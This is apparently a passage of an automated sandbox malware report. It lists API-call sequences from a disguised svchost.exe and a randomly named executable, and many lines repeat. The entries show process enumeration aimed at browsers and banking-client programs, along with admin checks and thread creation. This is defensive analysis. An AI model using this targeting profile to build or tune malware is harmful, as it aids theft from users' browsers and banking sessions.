      Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D37300
      Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D37300
      Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D37300
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02D367D0
      Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe1_2_02D31660
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D237E0
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D237E0
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D237E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028A7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028A7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028A7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,C